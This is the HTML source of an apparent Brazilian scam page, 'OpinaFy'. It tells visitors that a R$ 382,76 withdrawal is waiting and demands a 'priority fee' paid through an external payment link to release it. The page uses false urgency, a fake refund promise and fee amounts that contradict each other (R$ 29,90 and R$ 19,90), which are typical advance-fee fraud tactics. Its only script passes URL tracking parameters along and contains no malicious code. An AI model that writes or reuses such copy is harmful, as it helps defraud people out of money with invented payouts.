<!DOCTYPE html><html lang="pt-BR"><head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Página de Saque | OpinaFy</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      margin: 0;
      padding: 0;
      color: #fff;
      background-color: #000;
    }

    .alert-section {
      background-color: red;
      color: white;
      padding: 15px;
      text-align: center;
      font-weight: bold;
    }

    .main-content {
      padding: 20px;
      background-color: #000;
      color: white;
      text-align: center;
    }

    .logo {
      float: left;
      margin-right: 10px;
    }

    .value {
      float: right;
      background-color: #333;
      color: white;
      font-size: 2em;
      font-weight: bold;
      padding: 10px 20px;
      border-radius: 20px;
    }

    h1 {
      color: #00ff00;
      font-size: 2.5em;
      margin: 20px 0;
      text-align: center;
      padding: 100px 0 20px 0;
    }

    .highlight-green {
      color: #00ff00;
      font-weight: bold;
    }

    .highlight-red {
      color: #ff0000;
      font-weight: bold;
    }

    .pulsing-button {
      display: inline-block;
      background-color: #00ff00;
      color: black;
      font-weight: bold;
      padding: 15px 30px;
      margin-top: 20px;
      text-decoration: none;
      border-radius: 5px;
      animation: pulse 1.5s infinite;
    }

    @keyframes pulse {
      0%, 100% {
        transform: scale(1);
      }
      50% {
        transform: scale(1.1);
      }
    }

    .faq-section, .warning-section {
      margin-top: 30px;
      background-color: #222;
      padding: 15px;
      border-radius: 5px;
    }

    .footer {
      display: flex;
      justify-content: center;
      align-items: center;
      gap: 20px;
      padding: 20px;
      background-color: #111;
    }

    .footer img {
      width: 80px;
    }
  </style>
</head>
<body>

  <!-- Seção de Alerta -->
  <div class="alert-section">
    ATENÇÃO: NÃO PRIORIZAR AGORA SIGNIFICA ACEITAR ESPERAR ATÉ 30 DIAS PARA TER SEU SALDO DISPONÍVEL.
  </div>

  <!-- Seção Principal -->
  <div class="main-content">
    <div class="logo">
      <img src="images/yIHufDESjbwR.webp" alt="Logo" width="100">
    </div>
    <div class="value">
      R$ 382,76
    </div>
    <h1>Parabéns! 🎉</h1>
    <p>
      Seu saque já está programado, mas devido ao alto volume de solicitações, ele seguirá uma <span class="highlight-red">fila de espera de até 30 dias</span> para ser liberado.
    </p>
    <p>
      Se preferir, oferecemos uma opção de liberação imediata: por apenas <span class="highlight-green">R$ 29,90</span> você recebe o valor completo, incluindo a taxa de segurança, <span class="highlight-green">em até 5 minutos via PIX</span> na sua chave cadastrada.
    </p>
    <p>
      Evite a espera e receba seu saldo NO VALOR DE <span class="highlight-green">R$ 382,76</span> imediatamente.
    </p>
    <a href="https://go.pepperpay.com.br/afrqw" class="pulsing-button">PAGAR TAXA E RECEBER AGORA</a>

    <!-- Seção de Advertência -->
    <div class="warning-section">
      <h2>ATENÇÃO!</h2>
      <p>Você pagou a taxa de cadastro de <span class="highlight-green">R$19,90</span>, que será reembolsada junto com seu saque de <span class="highlight-green">R$ 382,76</span> dentro do aplicativo. Total a receber dentro do app: <span class="highlight-green">R$ 382,76</span>.</p>
      <p>Agora está pendente sua taxa de transferência de <span class="highlight-red">R$ 19,90</span> ! E só será possível receber de imediato o valor de <span class="highlight-green">R$ 382,76</span> após o pagamento da taxa de prioridade.</p>
    </div>

    <!-- Seção FAQ -->
    <div class="faq-section">
      <h2>Dúvidas</h2>
      <p><strong>– Por que tem essa taxa?</strong><br> A taxa cobre os custos operacionais e de segurança para processar seu saque imediato via PIX. Sem ela, seu pagamento seguirá o prazo padrão de até 30 dias.</p>
      <p><strong>– Se eu não pagar a taxa?</strong><br> Sem o pagamento da taxa de prioridade, seu saque continuará agendado normalmente e será liberado no prazo padrão após 30 dias.</p>
      <p><strong>– O que acontece após eu pagar?</strong><br> Após a confirmação do pagamento, seu saque é liberado automaticamente e você recebe o valor completo na sua chave Pix cadastrada em até 5 minutos.</p>
    </div>
  </div>

  <!-- Seção de Rodapé -->
  <div class="footer">
    <img src="images/FyiZyS2iHnFO.png" alt="Imagem 1">
    <img src="images/FjOtArMphImH.png" alt="Imagem 2">
  </div>
 <!-- Script Utms -->
      <script>
          function adicionarParametrosAosLinks() {
              const urlParams = new URLSearchParams(window.location.search);

              // Modificar os links <a> se houver
              const links = document.querySelectorAll('a');
              links.forEach(link => {
                  const href = new URL(link.href);
                  urlParams.forEach((value, key) => {
                      href.searchParams.set(key, value);
                  });
                  link.href = href.toString();
              });
          }

          // Função para redirecionar com parâmetros da URL atual e o e-mail preenchido
          function abrirComParametros() {
              const urlParams = new URLSearchParams(window.location.search);

              // Captura o valor do campo de e-mail, se existir
              const email = document.getElementById('email')?.value;
              
              // Adiciona o e-mail aos parâmetros da URL, caso esteja preenchido
              if (email) {
                  urlParams.set('email', email);
              }

              // Constrói a nova URL com os parâmetros
              const novaUrl = '../front/?' + urlParams.toString();
              
              // Abre a URL com os parâmetros em uma nova aba
              window.open(novaUrl, '_blank');
          }

          // Chama a função ao carregar a página
          document.addEventListener('DOMContentLoaded', adicionarParametrosAosLinks);
      </script>
      <!-- Script Utms -->



</body></html>